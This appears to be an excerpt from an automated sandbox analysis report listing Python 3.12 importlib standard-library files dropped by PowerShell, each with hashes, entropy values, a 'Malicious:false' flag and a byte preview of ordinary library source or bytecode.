                              Preview:.........U.fq.........................H.....d.Z.d.d.l.m.Z...d.d.l.Z...G.d...d.e.j.............................Z.y.).z>Subset of importlib.abc used to reduce importlib.util imports......)..._bootstrap.....Nc...........................e.Z.d.Z.d.Z.d...Z.d...Z.y.)...Loaderz'Abstract base class for import loaders.c...........................y.).z.Return a module to initialize and into which to load... This method should raise ImportError if anything prevents it. from creating a new module. It may return None to indicate. that the spec should create the new module.. N..)...self..specs.... .LC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\importlib\_abc.py..create_modulez.Loader.create_module....s................c.....................R.....t.........|.d.........s.t...........t.........j...................|.|.........S.).a....Return the loaded module... The module must be added to sys.modules and have import-related. attributes set properl
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):10455
                              Entropy (8bit):5.241708548074997
                              Encrypted:false
                              SSDEEP:192:ZOoAj+k16K3an/5qq3MsPMbDA9ntVSGz03czkDgcn:cnjG/5qq3veA9ntB5QM4
                              MD5:D8FD11DD74255621C5070B8476A34598
                              SHA1:CAE32FA91948C4D88D8B95CB96C6CD5CC1EEFCCE
                              SHA-256:4635DA14C6CB646F0D707E60F972DEC34AF4A2DFEAADE7B0D29BBF147B329E70
                              SHA-512:D1BE677EE20259CF245AADAB6A91E105DA3BF55547023533B7552293CA371B9370FEEBB23418E06A59E1FA90AD3E21E3ADF822DFC49E23701223C561E924837E
                              Malicious:false
                              Preview:.........U.f..........................4.....d.Z.d.d.l.m.Z...d.d.l.m.Z.....d.d.l.Z...d.d.l.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.m.Z...g.d...Z.d...Z.d...Z...G.d...d.e.j$............................Z...e.e.e.j(..................e.j*..................e.j,..................e.j...............................G.d...d.e.j$............................Z...e.e.e.j2..............................G.d...d.e.........Z...G.d...d.e.........Z...e.e.e.j(..................e.j*..................e.j8..............................G.d...d.e.........Z...e.e.e.j<..............................G.d...d.e.j>..................e.e.........Z...e.e.e.j@..................e.jB..............................G.d...d.e.jD..................e.e.........Z"..e.e"e.j@............................y.#.e.$.r.Z.e.j...................d.k7..r...d.Z.Y.d.Z.[....pd.Z.[.w.w.x.Y.w.#.e.$.r...e.Z.Y....}w.x.Y.w.).z(Abstract base classes related to import......)..._bootstrap_external)...machinery.....N.._frozen_importlib)...Loader)...abc).r......Me
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):501
                              Entropy (8bit):5.360310933194613
                              Encrypted:false
                              SSDEEP:12:h9fSBdsrUEyqw1zNxQj4gwKJO0UnqI5ChB3aghpPT0q/:hB6s4Eyqw1zNxsCKJO4Fhogh5Y6
                              MD5:A4A4F16BD609D77FF460B5E4FC470D64
                              SHA1:B38AFAB2CAB539EA63B31C45769A51490C32007C
                              SHA-256:5F6FFD4A198B8F8D970E97CBF7C13E7525BE538B81AE2B0CB0C8397030ACEC56
                              SHA-512:A6FBF256719F22543D9A06181CAEB4BB06991C1330F8B5BBDB6DEF555C1F5E65ED555F6A7D1BDED8D972478D4A82C9041D5C83512EBAD14A9DCEBE472948A1D9
                              Malicious:false
                              Preview:.........U.fS.........................(.....d.Z.d.d.l.m.Z.m.Z.m.Z.m.Z...g.d...Z.y.).z..Compatibility shim for .resources.readers as found on Python 3.10...Consumers that can rely on Python 3.11 should use the other.module directly.......)...FileReader..ZipReader..MultiplexedPath..NamespaceReaderN)...__doc__..resources.readersr....r....r....r......__all__........OC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\importlib\readers.py..<module>r........s............................L...r....
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):1393
                              Entropy (8bit):4.427551858910038
                              Encrypted:false
                              SSDEEP:24:7+SdXp8ImdaCtl27fisRiqITfqF6BSES5C+LOqqc9:CSK07fisQqgqF2SEqxz
                              MD5:B9344DFD73AFA9269F1701F6959D7A94
                              SHA1:B4945D7DE3B00D0761760B6131D9F7D3A95411D6
                              SHA-256:795157B91862D662AE681C0521DAA1311B34B763B955E01505A27C865D848EAE
                              SHA-512:7A994E456BEC98C52A2130898FDE1F5148A5919F17F814CA4357BF7B9C48C100930D0519F2A8BE5D4ED37D17C0C7AB0A8F571BB71EF01613E8ED24B715A4F1CB
                              Malicious:false
                              Preview:"""Subset of importlib.abc used to reduce importlib.util imports."""..from . import _bootstrap..import abc......class Loader(metaclass=abc.ABCMeta):.... """Abstract base class for import loaders.""".... def create_module(self, spec):.. """Return a module to initialize and into which to load..... This method should raise ImportError if anything prevents it.. from creating a new module. It may return None to indicate.. that the spec should create the new module... """.. # By default, defer to default semantics for the new module... return None.... # We don't define exec_module() here since that would break.. # hasattr checks we do to support backward compatibility..... def load_module(self, fullname):.. """Return the loaded module..... The module must be added to sys.modules and have import-related.. attributes set properly. The fullname is a str..... ImportError is raised on failure.....
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):58607
                              Entropy (8bit):4.432175502845617
                              Encrypted:false
                              SSDEEP:768:18AwHfgLuEbK7qyz4yBZIFUxn3vkuFlszRJ1l89GRO0sdB4miJ55v:u3IuEbwq5vUh3vku+SYv
                              MD5:683A9FFC2665B44EAB0DC6CD7FEAE818
                              SHA1:44E1896F51986A655FF3B791BCD09B3AEEC7C707
                              SHA-256:74A7017D6CCF9AAB6A6140771DB1E83118449331DFDB3AFA87A1C06A372C4F05
                              SHA-512:FCD09112256AE27ADB4322512173A65D827DAA69EF844FDC4A9DCB85195F685AA22DCEE7DAB6CDD1C80AD2D46F937D1D6130B1C3DC66C8EFEF64C32E7052FE0F
                              Malicious:false
                              Preview:"""Core implementation of import.....This module is NOT meant to be directly imported! It has been designed such..that it can be bootstrapped into Python as the implementation of import. As..such it requires the injection of specific modules and attributes in order to..work. One should use importlib as the public-facing version of this module....."""..#..# IMPORTANT: Whenever making changes to this module, be sure to run a top-level..# `make regen-importlib` followed by `make` in order to get the frozen version..# of the module updated. Not doing so will result in the Makefile to fail for..# all others who don't have a ./python around to freeze the module..# in the early stages of compilation...#....# See importlib._setup() for what is injected into the global namespace.....# When editing this code be aware that code executed at import time CANNOT..# reference any injected objects! This includes not only global code but also..# anything specified at the class level.....def _object_name
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):70920
                              Entropy (8bit):4.782756894999464
                              Encrypted:false
                              SSDEEP:768:iKsoAmFfyJ4QFhE/tn5ePIJ0feP1tI4qOuMCxl6knccZ/76UlgMvflotc9:txQ4QF8tn5eP8C4q6kccZzZveq
                              MD5:31949D8E3054036EFFF8B3AEE9DF79BA
                              SHA1:1A170A0F5875DF05AE22F3AFD90353B03BA9232C
                              SHA-256:A4644D1472529A8F2BDF039CC211630CC4B37CD293F8AE13FD8D974D37E6DC57
                              SHA-512:6338A2770939DF8CD4AA8A614868DE89F93D18E53AD7900D6AE043F389BB8C1473083CA75FB99C1592A92CFC62E453B4837C023BF4D578E2003C681BCC03522C
                              Malicious:false
                              Preview:"""Core implementation of path-based import.....This module is NOT meant to be directly imported! It has been designed such..that it can be bootstrapped into Python as the implementation of import. As..such it requires the injection of specific modules and attributes in order to..work. One should use importlib as the public-facing version of this module....."""..# IMPORTANT: Whenever making changes to this module, be sure to run a top-level..# `make regen-importlib` followed by `make` in order to get the frozen version..# of the module updated. Not doing so will result in the Makefile to fail for..# all others who don't have a ./python around to freeze the module in the early..# stages of compilation...#....# See importlib._setup() for what is injected into the global namespace.....# When editing this code be aware that code executed at import time CANNOT..# reference any injected objects! This includes not only global code but also..# anything specified at the class level.....# Module
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):7851
                              Entropy (8bit):4.615080798654411
                              Encrypted:false
                              SSDEEP:96:+E1GL85updL/sl7/piIJYkYuHImwTh2M5XyEZUM5wnEeAA/h/8M8HMDx5D2dhl9G:0L/+/YIBIjyyroF8c1470fY7GTDHf
                              MD5:24BD6DA498D8D1962F931980E80996DC
                              SHA1:6B1B13F61A258C19EB7FDDE5581026ABBBCBB084
                              SHA-256:E968730B743A235C1D4D245563DD2257FE1D3CE4FAA22AEA0274680B3B2BDE97
                              SHA-512:7CC1DB4172573961AA445319E3D3FE3B1141CA51441AB65C0CFEB2FA5100B0F3D8D25EE9AB8F22518A527CF38FC02C876AA671844920CCA2C3D458EBE382A86E
                              Malicious:false
                              Preview:"""Abstract base classes related to import."""..from . import _bootstrap_external..from . import machinery..try:.. import _frozen_importlib..except ImportError as exc:.. if exc.name != '_frozen_importlib':.. raise.. _frozen_importlib = None..try:.. import _frozen_importlib_external..except ImportError:.. _frozen_importlib_external = _bootstrap_external..from ._abc import Loader..import abc..import warnings....from .resources import abc as _resources_abc......__all__ = [.. 'Loader', 'MetaPathFinder', 'PathEntryFinder',.. 'ResourceLoader', 'InspectLoader', 'ExecutionLoader',.. 'FileLoader', 'SourceLoader',..]......def __getattr__(name):.. """.. For backwards compatibility, continue to make names.. from _resources_abc available through this module. #93963.. """.. if name in _resources_abc.__all__:.. obj = getattr(_resources_abc, name).. warnings._deprecated(f"{__name__}.{name}", remove=(3, 14)).. globals()[name] = obj..
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):900
                              Entropy (8bit):4.955279656424343
                              Encrypted:false
                              SSDEEP:24:YT166asGSaopamPQpaJ2XEaJ2QaJLYaJRaJnaJiaJeMaJ2h5Jir:2VGSD0y20y2QyLYyRynyiyfy2h5Jir
                              MD5:2492D118AAA72971157EC93AD1919FCB
                              SHA1:6A48065FDA49FE587D255CACF31EFDAFC09F8AE8
                              SHA-256:9A2EE437C38E45CDF7559F613F57209B5B11C0824A9069192B9EBD5A2CEEFA1A
                              SHA-512:DDCB67E4DDE35064CF851B6C7F4D9B58123CE01D75FE20369B189BC52123AAB8B3ECD53F40A9D50875A360992AD453239C5BAFA5DC17C3C41A0EDD20D7E7DD4F
                              Malicious:false
                              Preview:"""The machinery of importlib: finders, loaders, hooks, etc."""....from ._bootstrap import ModuleSpec..from ._bootstrap import BuiltinImporter..from ._bootstrap import FrozenImporter..from ._bootstrap_external import (SOURCE_SUFFIXES, DEBUG_BYTECODE_SUFFIXES,.. OPTIMIZED_BYTECODE_SUFFIXES, BYTECODE_SUFFIXES,.. EXTENSION_SUFFIXES)..from ._bootstrap_external import WindowsRegistryFinder..from ._bootstrap_external import PathFinder..from ._bootstrap_external import FileFinder..from ._bootstrap_external import SourceFileLoader..from ._bootstrap_external import SourcelessFileLoader..from ._bootstrap_external import ExtensionFileLoader..from ._bootstrap_external import NamespaceLoader......def all_suffixes():.. """Returns a list of all recognized module suffixes for this process""".. return SOURCE_SUFFIXES + BYTECODE_SUFFIXES + EXTENSION_SUFFIXES..
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):29709
                              Entropy (8bit):4.587258080464864
                              Encrypted:false
                              SSDEEP:384:LAYSytaMmMXy0Tgx3/eEXeb1S5OeGZIMVopvE85tQTsaTC2SWTtdB7GFQ6+hwRgG:LPSgmMXy4gxNOlVavENfhNSCwnaq
                              MD5:30110FEE47A4E4F3874FE2C46CDDC3B9
                              SHA1:CA4925F316C4DE2C05B5D7C98C2F33445BD711BE
                              SHA-256:9798E43428F6C11BF9C4602BE62599FF2470088FE0BF82C8BBBC177E740E1F08
                              SHA-512:965DBC96E891397CCA995CF15B1150E2BDAB73B4BC8F9B05B3D9B56F31F44750D04F2449688ED5A76B283496906129F27F43C8281D55AF95CA94D7FDC6D8BE42
                              Malicious:false
                              Preview:import os..import re..import abc..import csv..import sys..import email..import pathlib..import zipfile..import operator..import textwrap..import warnings..import functools..import itertools..import posixpath..import contextlib..import collections..import inspect....from . import _adapters, _meta..from ._collections import FreezableDefaultDict, Pair..from ._functools import method_cache, pass_none..from ._itertools import always_iterable, unique_everseen..from ._meta import PackageMetadata, SimplePath....from contextlib import suppress..from importlib import import_module..from importlib.abc import MetaPathFinder..from itertools import starmap..from typing import List, Mapping, Optional, cast......__all__ = [.. 'Distribution',.. 'DistributionFinder',.. 'PackageMetadata',.. 'PackageNotFoundError',.. 'distribution',.. 'distributions',.. 'entry_points',.. 'files',.. 'metadata',.. 'packages_distributions',.. 'requires',.. 'version',..]......class PackageN
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):48523
                              Entropy (8bit):5.171535604541654
                              Encrypted:false
                              SSDEEP:768:M+Md9mVMXBPqh1fpSjme5nfrKYBgHATlZuDJnw/VdfZLl:M+i9mMqhajmwnfXB8AwJw/VrLl
                              MD5:914E88155789623AC240D9BAB20259CC
                              SHA1:B1775AB0CA4FBCB4D61B8E1B598E01A7448E3BA6
                              SHA-256:BD460FE55D2B53C03A01A52EC0A7B8C5FC66E3634934C62CB1CB3AF6AC1B45D4
                              SHA-512:62D5513DCAA978A8ACA6EFA92856F0C4E7D87F9E596D09EDA1C6BC7AB9388E6C5F90E6FC3AF13DF273CEEFA4AB1538A1476CD08AAD85558ED2FC212AFBE34839
                              Malicious:false
                              Preview:.........U.f.t........................8.....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l m!Z!..d.d.l"m#Z#..d.d.l.m$Z$..d.d.l%m&Z&m'Z'm(Z(m)Z)..g.d...Z*..G.d...d.e+........Z,..G.d...d.........Z-..G.d...d.........Z...G.d...d.e.........Z/..G.d...d.e0........Z1..G.d...d.e.jd..........................Z3..G.d...d.........Z4..G.d...d.........Z5..G.d...d.e5........Z6..G.d ..d!e#........Z7..G.d"..d#........Z8..G.d$..d%........Z9..G.d&..d'........Z:..G.d(..d)e7........Z;..G.d*..d+e6........Z<d,..Z=d-..Z>d.e.j:..................f.d/..Z?d0..Z@..e.j...................e...e.j...................d1.........2........ZC..d.e1f.d3..ZDd4..ZEd5..ZFd.e'eGe&eG....f.....f.d6..ZHd7..ZId8..ZJy.)9.....N.....)..._adapters.._meta)...FreezableDefaultDict..Pair)...method_cache..pass_none)...always_iterable..unique_everseen)...Pack
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):3874
                              Entropy (8bit):5.295164621411875
                              Encrypted:false
                              SSDEEP:48:FZ6XRGKwmIXs8SAByPMOCkXMQjKRUlt8xwEXd15IB8NtZ2Ct3GN:HKMsUsMHRUl6zP+B8N7HI
                              MD5:961C57433A0885E8552D0AB63BB27FFD
                              SHA1:E829656D26CD286088ECB88F2429841921167A6B
                              SHA-256:BDE57CE938E54928AE242335DFAA7AB16FA95A45862B1B9FC02957BF3DA8CBD7
                              SHA-512:E8E4A1FCF807D885619A983E5B2AE2C796EFB361FF7F1B665320699BEE46CC8E3A1F9C40676E431FBC8F402BBD50C3D216D5B81082BCBD5BF2A336447930ED6F
                              Malicious:false
                              Preview:.........U.f...............................d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.....e.j...................e.j...................d.e.d...........Z...G.d...d.e.j...................j...........................Z.y.)......N.....)...FoldedCasezFImplicit None on return values is deprecated and will raise KeyErrors......)...stacklevelc............................e.Z.d.Z...e...e.e.g.d...................Z...d.e.j...................j...................f...f.d...Z.d...Z...f.d...Z...f.d...Z.d...Z.e.d...........Z...x.Z.S.)...Message)...Classifierz.Obsoletes-Dist..Platformz.Project-URLz.Provides-Distz.Provides-Extraz.Requires-Distz.Requires-Externalz.Supported-Platform..Dynamic..origc.....................l.......t...........|.....|.........}.t.........|.........j...................t.........|...................|.S...N)...super..__new__..vars..update)...clsr......res..__class__s.... ..ZC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\importlib\metadata\_adapters.pyr....z.Mes
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):1922
                              Entropy (8bit):5.148390936025754
                              Encrypted:false
                              SSDEEP:24:hKqCflLM8ZOSIJxBgP3d7IjiBkXnpflW9l05BMtRKq6G1DR2Nu2I4l/dqJp3Y:4Xl4KOSIV6KjiqOlcBMHKgR2I2Hl+p3Y
                              MD5:C4A8205FA3A92E78D0F8DE07AB30D685
                              SHA1:368D13DE2ABBB85B11227E47D998C460C19E90FA
                              SHA-256:A34EB1866E9E8AD2C0C6C5E76964730B64A6516C7FDA1A2A54AE345B5A04ACB2
                              SHA-512:6EC107C7520D9091900F1AB7012EC6C4ADCC0C7B38B2EA2188C9E541D517907C0C01EA1923A84475361638DAF66108B1309C2D123C758512E8D83E286FCEAF1C
                              Malicious:false
                              Preview:.........U.f..........................n.....d.d.l.Z...G.d...d.e.j...........................Z...G.d...d...e.j...................d.d.................Z.y.)......Nc.....................(.......e.Z.d.Z.d.Z...f.d...Z.d...Z...x.Z.S.)...FreezableDefaultDicta!.... Often it is desirable to prevent the mutation of. a default dict after its initial construction, such. as to prevent mutation during iteration... >>> dd = FreezableDefaultDict(list). >>> dd[0].append('1'). >>> dd.freeze(). >>> dd[1]. []. >>> len(dd). 1. c.....................:.........t.........|.d.t...........|.............|.........S.).N.._frozen)...getattr..super..__missing__)...self..key..__class__s.... ..]C:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\importlib\metadata\_collections.pyr....z FreezableDefaultDict.__missing__....s.........<.w.t.Y.....(;..<.S..A..A.....c...............................f.d....._.........y.).Nc.....................$.........j...........................S.).
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):3480
                              Entropy (8bit):5.283562690673815
                              Encrypted:false
                              SSDEEP:48:7fbuTGKoOIXlUsSUUEQ1lGIGX5G5GurSYwBpHPdG7lfsJdSOTK/J/SarXN0le/y3:7GoOCDUX4sXwjvMXNpa6kIO5pL
                              MD5:B1ABF6B6C6255E1DE4D16BACFD1C525F
                              SHA1:A485935A138C3EBA4C745CD1BC2EEE868CD29779
                              SHA-256:BAFB0A7927DBC2D3E0C9950C75258561AE5B0F810C06CF9A2AB9BC1C3056D060
                              SHA-512:6B5D09013C440C75777A4428E7FD5458DF3C9C8921F8D7D5C0E0AD195EB13444A307F1AD6DFB46AECE3CC1905E5DA81529088501078C4D823C98543D1C48A09F
                              Malicious:false
                              Preview:.........U.f..........................".....d.d.l.Z.d.d.l.Z.d.d...Z.d...Z.y.)......Nc.....................V...........x.s...t.........j.................................f.d...}.d...|._.........|.S.).aV.... Wrap lru_cache to support storing the cache data in the object instances... Abstracts the common paradigm where the method explicitly saves an. underscore-prefixed protected property on first call and returns that. subsequently... >>> class MyClass:. ... calls = 0. .... ... @method_cache. ... def method(self, value):. ... self.calls += 1. ... return value.. >>> a = MyClass(). >>> a.method(3). 3. >>> for x in range(75):. ... res = a.method(x). >>> a.calls. 75.. Note that the apparent behavior will be exactly like that of lru_cache. except that the cache is stored on each instance, so values in one. instance will not flush values from another, and when an instance is. deleted, so are the ca
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):2404
                              Entropy (8bit):5.4991645924323835
                              Encrypted:false
                              SSDEEP:48:J+N3JjfPMrnZ48AVCkCzOQVQqtXBcNqo+UoJyE5fp:kN5j848lhBnY+UhE5R
                              MD5:EC526EC6861F6B32D20B865F2DA340A0
                              SHA1:EAAB7F9F6647E3C9C679B6FCE4371D02F5F42A9B
                              SHA-256:380818D012D5D9D9590F3DFD6D1BD67E611F203C9C9F18481DCF39DEDCDAC890
                              SHA-512:DA6ABDB3E8500CF8D5917E7DC3FE767933DBCEDDAB2FE4BACE8BB217CC7E446548B03A5D15C31534417F3976FC75FB1666DE6448BD7CA6D652979382BBABDA13
                              Malicious:false
                              Preview:.........U.f].........................&.....d.d.l.m.Z...d.d...Z.e.e.f.f.d...Z.y.)......)...filterfalseNc................#........K.....t.................}.|.j...................}.|..(t.........|.j...................|.........D.]...}...|.|...........|...........y.|.D.]...}...|.|.........}.|.|.v.s.....|.|...........|...........y...w.).zHList unique elements, preserving order. Remember all elements ever seen.N)...set..addr......__contains__)...iterable..key..seen..seen_add..element..ks.... .[C:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\importlib\metadata\_itertools.py..unique_everseenr........ss..............5.D....x.x.H....{..".4.#4.#4.h..?......G....W.......M......... ......G....G...A......}..................s.....A.A$....A$.c..........................|...t.........d.........S.|...t.........|.|.........r.t.........|.f.........S...t.........|.........S.#.t.........$.r...t.........|.f.........c.Y.S.w.x.Y.w.).ax...If *obj* is iterable, return an iterator over its items:
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):3320
                              Entropy (8bit):5.012057236879988
                              Encrypted:false
                              SSDEEP:96:o1IxqYyQ83oZ47j5wGe4fFYdlqrTI8YtWtXBjJH:o1ITyQ83oZ47j5wN4fFYdlq3DYtWtRlH
                              MD5:A122A60EC73A3311305BB88927E19432
                              SHA1:105035640320D9DAE206F69890FD61608FD61C8F
                              SHA-256:B00DD4B9B1D320CFB0CF824E6FBEFACA64931F2F952C55DB5646DD098CF04AD2
                              SHA-512:FDC5954D695F8E7662D67FEE93F216A66326D9AB5CCB4CF9F79981D88CAF2C92B30750511A0379C4671B4089335111C05D93F539C9C86A834DC7B940EA98FDE5
                              Malicious:false
                              Preview:.........U.fu.........................z.....d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.....e.d.........Z...G.d...d.e.........Z...G.d...d.e.e.............Z.y.)......)...Protocol)...Any..Dict..Iterator..List..Optional..TypeVar..Union..overload.._Tc.....................".....e.Z.d.Z.d.e.f.d...Z.d.e.d.e.f.d...Z.d.e.d.e.f.d...Z.d.e.e.....f.d...Z.e.d.d.e.d.d.d.e.e.....f.d...........Z.e.d.e.d.e.d.e.e.e.f.....f.d...........Z.e.d.d.e.d.d.d.e.e.e.........f.d...........Z.e.d.e.d.e.d.e.e.e.....e.f.....f.d...........Z.e.d.e.e.e.e.e.e.....f.....f.....f.d...........Z.y.)...PackageMetadata..returnc...........................y...N......selfs.... .VC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\importlib\metadata\_meta.py..__len__z.PackageMetadata.__len__.....................itemc...........................y.r....r....).r....r....s.... r......__contains__z.PackageMetadata.__contains__....r....r......keyc...........................y.r....r....).r....r....s.... r......__getitem__z.Pac
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):3881
                              Entropy (8bit):5.00437204602975
                              Encrypted:false
                              SSDEEP:96:zzrbGowYRzHinOrIAeQc2jrAYWdDMWwAk+S3MOjRM:mowCmVAeQvAYWdPwFnK
                              MD5:16B5556291FAACEED52C2A92CFA41624
                              SHA1:D77F01D77FE2CC2414D0C1371AFDF945DCCB337B
                              SHA-256:3C9EB32943A249847C8B85D061F48F705C34270ADD45AFADCC3E54F7D55CAA76
                              SHA-512:7147DECF092A9B4C3EC560186DA47E3F34CF0A6ED33B995B96B6B6FC712E44B7FDF3DA29E6CA3F7D5F8446966A44D944E99559D01753E8676D90510D5ADA5EC8
                              Malicious:false
                              Preview:.........U.f................................d.d.l.Z.d.d.l.m.Z.....G.d...d.e.........Z.y.)......N.....)...method_cachec.....................h.......e.Z.d.Z.d.Z.d...Z.d...Z.d...Z.d...Z.d...Z...f.d...Z.d...Z.e...f.d...........Z.d...Z.d.d...Z...x.Z.S.)...FoldedCasea{.... A case insensitive string class; behaves just like str. except compares equal when the only variation is case... >>> s = FoldedCase('hello world').. >>> s == 'Hello World'. True.. >>> 'Hello World' == s. True.. >>> s != 'Hello World'. False.. >>> s.index('O'). 4.. >>> s.split('O'). ['hell', ' w', 'rld'].. >>> sorted(map(FoldedCase, ['GAMMA', 'alpha', 'Beta'])). ['alpha', 'Beta', 'GAMMA'].. Sequence membership is straightforward... >>> "Hello World" in [s]. True. >>> s in ["Hello World"]. True.. You may test for set inclusion, but candidate and elements. must both be folded... >>> FoldedCase("Hello World") in {s}. True. >>> s in {FoldedCase("Hello Wo
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):2495
                              Entropy (8bit):4.4481790370885905
                              Encrypted:false
                              SSDEEP:48:gIwGFG9kX+5jVN5+LjtoIKEuFKRw5oGpEnFSy1lkVsqG31WCkG:gBmG9FjX5+uG1Fnl8SWCkG
                              MD5:C91BB638CA8D00BD6E43AEBD2E63E401
                              SHA1:A2966028FF90685B01AA61332A7E65035F5AE0A9
                              SHA-256:C42DEC9F9FBB2FC493DA2E0599158A67C8D3DFA7B6D69955AAA1BA9ED589A6BA
                              SHA-512:B6AF727E94564D5066B635E87F1157A9B920B058554890A47E81304051C4EFE6CF3CB88745EF4875536FE09BB816E5BAC17F57C81C9008C0039F16A28D7835E5
                              Malicious:false
                              Preview:import functools..import warnings..import re..import textwrap..import email.message....from ._text import FoldedCase......# Do not remove prior to 2024-01-01 or Python 3.14.._warn = functools.partial(.. warnings.warn,.. "Implicit None on return values is deprecated and will raise KeyErrors.",.. DeprecationWarning,.. stacklevel=2,..)......class Message(email.message.Message):.. multiple_use_keys = set(.. map(.. FoldedCase,.. [.. 'Classifier',.. 'Obsoletes-Dist',.. 'Platform',.. 'Project-URL',.. 'Provides-Dist',.. 'Provides-Extra',.. 'Requires-Dist',.. 'Requires-External',.. 'Supported-Platform',.. 'Dynamic',.. ],.. ).. ).. """.. Keys that may be indicated multiple times per PEP 566... """.... def __new__(cls, orig: email.message.Message):.. res = super().__
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):773
                              Entropy (8bit):4.707400693185867
                              Encrypted:false
                              SSDEEP:12:ysSCg72MrelLMEdrqbM1Mgd5aWqp/IV/MZhmuyNSKtVYCy:ytYlLMZ3y5aWowVEZ8m
                              MD5:0E214D282C8470C634BBA8872B3DC139
                              SHA1:98850B764D8FD22830CB9014E2528FE5FE36C315
                              SHA-256:4281B8DA21C38B837C93E93916D6BBC0A01F7E023C7D39251E3B80250F7D575E
                              SHA-512:9F024100BFCEA2ABCD2587C97CE0E35B7BF485A972C879883DA99E8F1A4A5931F9A9A2963354AF2389CB46314F1EBF43C09DCC5E30D25790E1470EC6E9539B01
                              Malicious:false
                              Preview:import collections......# from jaraco.collections 3.3..class FreezableDefaultDict(collections.defaultdict):.. """.. Often it is desirable to prevent the mutation of.. a default dict after its initial construction, such.. as to prevent mutation during iteration..... >>> dd = FreezableDefaultDict(list).. >>> dd[0].append('1').. >>> dd.freeze().. >>> dd[1].. [].. >>> len(dd).. 1.. """.... def __missing__(self, key):.. return getattr(self, '_frozen', super().__missing__)(key).... def freeze(self):.. self._frozen = lambda key: self.default_factory()......class Pair(collections.namedtuple('Pair', 'name value')):.. @classmethod.. def parse(cls, text):.. return cls(*map(str.strip, text.split("=", 1)))..
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):2999
                              Entropy (8bit):4.6344062686720875
                              Encrypted:false
                              SSDEEP:48:b8buTGBskHc4SpcJ1lGRGX5GEGuvSpQIgQyAdGnlfsJdSpzTKjJkmSphBlle/RlV:bgst6XJyQIT4bhU5I4NrM3IT4W
                              MD5:656CF285C9D4FAE91F3F4B02851338D5
                              SHA1:4F4293F48C7C74C7B0EC949AF3CC526C4F59084B
                              SHA-256:DA7408563C04CAD511DAEBF9E2A1091AD148DEF11A388437D05B97A5618B881D
                              SHA-512:453138A2FA3974AD3614842CE0948C439167513ACB18243E76C37449AAB71693600966A014690A0FCB0C246A01D0AFE10CFC269C44C904FF37F88DE197508CB3
                              Malicious:false
                              Preview:import types..import functools......# from jaraco.functools 3.3..def method_cache(method, cache_wrapper=None):.. """.. Wrap lru_cache to support storing the cache data in the object instances..... Abstracts the common paradigm where the method explicitly saves an.. underscore-prefixed protected property on first call and returns that.. subsequently..... >>> class MyClass:.. ... calls = 0.. ..... ... @method_cache.. ... def method(self, value):.. ... self.calls += 1.. ... return value.... >>> a = MyClass().. >>> a.method(3).. 3.. >>> for x in range(75):.. ... res = a.method(x).. >>> a.calls.. 75.... Note that the apparent behavior will be exactly like that of lru_cache.. except that the cache is stored on each instance, so values in one.. instance will not flush values from another, and when an instance is.. deleted, so are the cached values for that instance..... >>> b = MyClass()..
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):2141
                              Entropy (8bit):4.53241011385655
                              Encrypted:false
